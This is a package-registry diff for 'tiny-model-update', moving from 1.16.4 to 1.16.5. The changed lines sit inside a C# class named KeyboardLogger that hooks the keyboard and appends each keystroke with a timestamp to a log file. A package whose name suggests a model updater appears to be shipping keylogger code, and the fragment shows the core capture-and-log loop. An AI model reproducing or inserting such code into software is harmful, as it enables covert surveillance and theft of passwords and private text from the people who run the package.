tiny-model-update 1.16.4 → 1.16.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
|
@@ -276,7 +276,7 @@ public class KeyboardLogger {
|
|
|
276
276
|
int vkCode = Marshal.ReadInt32(lParam);
|
|
277
277
|
string key = ((Keys)vkCode).ToString();
|
|
278
278
|
string time = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss.fff");
|
|
279
|
-
File.AppendAllText("$logFile", "$time - Key: $key
|
|
279
|
+
File.AppendAllText("$logFile", "$time - Key: $key" + [Environment]::NewLine);
|
|
280
280
|
}
|
|
281
281
|
return CallNextHookEx(hookID, nCode, wParam, lParam);
|
|
282
282
|
}
|